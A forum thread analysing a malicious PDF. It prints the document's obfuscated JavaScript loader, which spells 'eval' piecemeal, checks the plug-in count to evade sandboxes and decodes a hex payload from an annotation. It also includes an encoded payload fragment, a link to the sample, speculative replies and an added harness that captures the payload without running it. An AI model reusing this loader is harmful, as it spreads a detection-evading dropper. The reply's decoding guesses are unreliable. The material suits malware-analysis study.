
Thread: Help analyzing a malicious PDF

  1. #1

    Help analyzing a malicious PDF

    1. Neither Annot in object 5 nor object 7 has a "-" in it, so how does "var arr = sum.split(/-/);" create an array?
    2. What does "app[fnc]/**/(buf);" do?
    3. What is the point of checking how many browser plugins there are?

    JS from object 9
    Code:
    var pr = null;
    var fnc = 'ev';          // 'ev' + 'a' + 'l' below spells "eval"; split up so the literal never appears
    var sum = '';
    
    app.doc.syncAnnotScan(); // make sure the document's annotation list is loaded
    
    // Gate 1: touch the annotations only if the viewer reports at least one plug-in
    if (app.plugIns.length != 0) {
        var num = 1;
        pr = app.doc.getAnnots({ nPage: 0 });   // all annotations on the first page
        sum = pr[num].subject;                  // Subject field of the second annotation holds the encoded data
    }
    
    var buf = "";
    
    // Gate 2: decode only if more than three plug-ins are present
    if (app.plugIns.length > 3) {
        fnc += 'a';
        var arr = sum.split(/-/);   // a string with no "-" splits into a one-element array, so the loop never runs
    
        for (var i = 1; i < arr.length; i++) {
            buf += String.fromCharCode("0x"+arr[i]);   // each "-"-separated element is read as a hex character code
        }
        fnc += 'l';                 // fnc is now "eval"
    }
    
    // Gate 3: with two or more plug-ins call app[fnc](buf), i.e. app["eval"](buf);
    // the /**/ is an empty comment that the parser drops
    if (app.plugIns.length >= 2)
    {
        app[fnc]/**/(buf);
    }

    Part of the encoded data from object 5
    Code:
    a5q311k7p350g164m0t241n1e6g6d232q4r241004276i2j4q6f3i2q2l6j7j2h494u5g1l6t780946777e8048276m3q43360836726c68283b6l7f7q4o5l7e1h7g32715l312h7p6p3r8383431227191n435l2j2e5i1l230a2b5u123s7a3p3h045o371t6d3n3q3b6s61193o7a6f5t4j3o58311r7h875l64460s2n4j876d134c3u1925763u1d33432n5f563r50864n647h845p5e7j0h2k677m0t2h1s6o31085j2q0j065g2718553c472c5062181k6d7o723f441n1a206f6m4d304718144o6639055b2m7f3161381q3m5t4a6h6k6756237d4u7s0n464r7l66264r5h0g1f68651n0l5d5k7e03742n2q087h371b25620i0f5i5r5k3c3f2j0i454j746l3u4m0u5d3i6u2l6c3f7a81414r2s7d045g5t5n426e3i1s07610u1l4p6q2d6p3q6u3t1c305352155s5f4t5n7d5d6k2n7r052g3g096f2p1g6k0a132s3307022r306p5d30437t5q3b1g1869527s0o4c1b167h7a404n2h436p1u226e2s012k3h4o395k347c4h374i656g3g617k7l4i7o6951257t5q22266c621n5r61791g2m5s72874d3i040g75336s303b0r045e356f0l3n270e1e5e4d6t3i4i6g680r7729680p865a49473379152359395u3336786i440d643d2d006m362u7781556n6j010g525g7p0u361a0h1e0g3q0r2j3h117i4o5c4g1r3p1m1m284u65851s3u6p7b0a822d802s6e5u3n1f2j6u072r512a5a1n0m5d6m2j62742u3k1b4t1a2j560j4q64460q7241846q0p558575814q1o75793e1r5r4c430q7u50


    Part of the encoded data from object 7
    Code:

    MALWARE/BIOHAZARD
    http://www.megaupload.com/?d=5F52NSCW

  2. #2
    I am new to examining this stuff, but it looks like a good one to look at. Thanks for the download. It looks like you are to the point where you have to start doing a couple of things.

    Q.What is the point of checking how many browser plugins there are?

    A. If you notice, the browser checks are looking for an amount of plugins (which must return a number) greater than the number in each if statement.

    In this case it could be that they are using this to identify if the script is running on a user machine that may have plugins or an emulation environment that might not have any sort of plugins. My thought is these can be removed, or you could say If (3 > 2) { code }.

    Trying to see it from an attacker's perspective: if I want to try and identify the environment that my payload is running in, maybe I can check plugins to see if there are any there. If not, the script is not going to run, but in most cases there will be for a user's machine, so let's let it run.

    Q. What does "app[fnc]/**/(buf);" do?

    var fnc = 'ev';
    fnc += 'a';
    fnc += 'l';

    var fnc = 'eval' --> this is probably broken up in order to evade signature detection by an automated scanner.
    app.doc ----> app seems to be the object used throughout this code "that I am not sure of". Also maybe this means that we need values from the plugins, but I don't think so.

    Where I am at on this currently -----> I actually ran into errors trying to get the code to execute with SpiderMonkey because of app.doc errors. After adding these objects in, my issue is now 'pr' not having a value.

    Q. Neither Annot in object 5 or 7 have a "-" in them so how does "var arr = sum.split(/-/);" create an array?

    I think the final result of this code is to convert Unicode into characters from the result of element1 = (0x + "object 5 (2 characters)"); element2 = for each "z" replace with element1.

    Of course that is all just a theory, not really any proof until I get the shellcode to output. Once that is the case I can frame it up and start debugging it and seeing what is next.
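Added example (not from either post or from the sample): the object 9 routine from post #1 re-implemented so it runs outside Acrobat, which is the stub problem post #2 hit with SpiderMonkey. The `app` object here is a constructed stand-in that models only the members the script touches (`plugIns.length`, `doc.syncAnnotScan()`, `doc.getAnnots({nPage: 0})` and an `eval` property); the annotation subjects are constructed test strings, not the real data from objects 5 and 7. It shows the three things asked in post #1: `split(/-/)` on a string with no "-" returns a one-element array, so the loop starting at index 1 appends nothing; `app[fnc]/**/(buf)` is `app["eval"](buf)` once the pieces are concatenated (the `/**/` is an empty comment); and the `plugIns.length` tests gate both the decoding and the final call, with a count of 2 or 3 leaving `fnc` as "ev" so the call fails.

```javascript
// Same decoding step the script performs: split the annotation's Subject on "-",
// skip element 0, read every remaining element as a hex character code.
function decodeSubject(sum) {
  var buf = "";
  var arr = sum.split(/-/);   // no "-" in sum  =>  arr is [sum], length 1, loop body never runs
  for (var i = 1; i < arr.length; i++) {
    buf += String.fromCharCode("0x" + arr[i]);   // Number("0x48") === 72 === "H"
  }
  return buf;
}

// Constructed stub for Acrobat's `app` object (assumption: only these members matter to
// the script). `subjects[1]` is what the script reads as pr[1].subject; index 0 is a decoy.
function makeApp(pluginCount, subjects, evalSink) {
  return {
    plugIns: new Array(pluginCount),          // only .length is consulted
    doc: {
      syncAnnotScan: function () {},
      getAnnots: function (opts) {
        if (!opts || opts.nPage !== 0) return [];   // the script only asks for page 0
        return subjects.map(function (s) { return { subject: s }; });
      }
    },
    eval: evalSink   // reached as app["eval"]; nothing named "ev" exists on the stub
  };
}

// The object 9 logic, line for line, with a trace of what it did.
function runObject9(app) {
  var trace = { getAnnotsCalled: false, fnc: null, buf: null, called: null };
  var pr = null;
  var fnc = 'ev';
  var sum = '';

  app.doc.syncAnnotScan();

  if (app.plugIns.length != 0) {             // gate 1
    var num = 1;
    trace.getAnnotsCalled = true;
    pr = app.doc.getAnnots({ nPage: 0 });
    sum = pr[num].subject;
  }

  var buf = "";

  if (app.plugIns.length > 3) {              // gate 2: decode and finish spelling "eval"
    fnc += 'a';
    buf = decodeSubject(sum);
    fnc += 'l';
  }

  if (app.plugIns.length >= 2) {             // gate 3: app[fnc]/**/(buf) === app[fnc](buf)
    if (typeof app[fnc] !== 'function') {
      // with 2 or 3 plug-ins fnc is still "ev"; app.ev is undefined, so the real script throws here too
      throw new TypeError("app." + fnc + " is not a function");
    }
    trace.called = fnc;
    app[fnc](buf);
  }

  trace.fnc = fnc;
  trace.buf = buf;
  return trace;
}

// Usage: capture the decoded payload instead of executing it.
// runObject9(makeApp(4, ["decoy", "x-48-65-6c-6c-6f"], function (payload) { /* inspect payload */ }));
```

Swapping the `evalSink` for a function that just records its argument is the safe way to get at the second-stage string without ever evaluating it; the plug-in count passed to `makeApp` reproduces each branch of the gating.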
